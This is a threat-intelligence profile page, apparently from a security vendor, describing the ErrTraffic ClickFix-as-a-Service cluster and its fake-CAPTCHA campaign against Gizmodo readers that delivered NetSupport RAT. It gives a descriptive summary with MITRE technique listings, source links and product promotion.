1 malware family

ErrTraffic

Also known asErrTraffic

ErrTraffic is a cybercriminal threat cluster/service identified in the provided reporting as operating a ClickFix-as-a-Service model. Proofpoint-linked reporting described campaigns as likely conducted either by the ErrTraffic service itself or by an affiliate of ErrTraffic. The service provides ready-made infrastructure for ClickFix attacks and allows customers to deliver malware of their choice. ErrTraffic is also explicitly listed among threat clusters beyond the TA569 ecosystem that use web injects. In the cited Gizmodo incident, activity attributed to an ErrTraffic affiliate used fake CAPTCHA/ClickFix prompts delivered via a malicious script injected into a compromised website account. The prompts were tailored by operating system and attempted to trick users into manually executing terminal or PowerShell commands. On Windows, the campaign attempted to install NetSupport RAT; a separate macOS payload was prepared but appeared ineffective because it was packaged in a password-protected ZIP archive. The content does not attribute ErrTraffic to any nation state, and no additional aliases or sub-groups are provided beyond the name ErrTraffic.

Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial

MITRE ATT&CK

Tradecraft

2 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

1 of 15 tactics3 techniques×N= number of intelligence reports citing this technique

MITRE ATT&CK

TA0001

Initial Access

2 techniques

T1189

Drive-by Compromise

T1566

Phishing

T1566.003

Spearphishing via Service

ARSENAL

Associated malware families

1 malware family attributed to this actor across reporting.

FamilyContextEvidenceLast seen

NetSupport RATНа компьютерах под управлением Windows атакующие пытались установить NetSupport RAT. Этот троян злоупотребляет легитимным инструментом удаленного администрирования NetSupport Manager и предоставляет своим операторам доступ к зараженной системе.1Jun 25, 2026

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app

xakepNews

Jun 25, 2026

Пользователи сайта Gizmodo столкнулись с ClickFix-атаками - Хакер

Likely operated the ClickFix campaign against Gizmodo readers, providing ClickFix-as-a-Service infrastructure to distribute malware via fake CAPTCHA prompts.

Jun 22, 2026

Gizmodo readers hit with ClickFix malware prompts after account compromise

A ClickFix-as-a-service operation whose affiliates deliver malware via fake CAPTCHA-style prompts that trick users into executing malicious commands.

security affairsNews

Jun 19, 2026

14,971 WordPress Sites Cleaned in Global SocGholish Takedown

Threat cluster identified as using web inject campaigns beyond the TA569 ecosystem.

proofpointNews

Jun 17, 2026

Sayonara, SocGholish: Operation Endgame Disrupts Major Cybercrime Operation | Proofpoint US

Threat cluster involved in web-inject campaigns using compromised websites and fake update style delivery.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.

Start free trial

Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping2

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal1

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.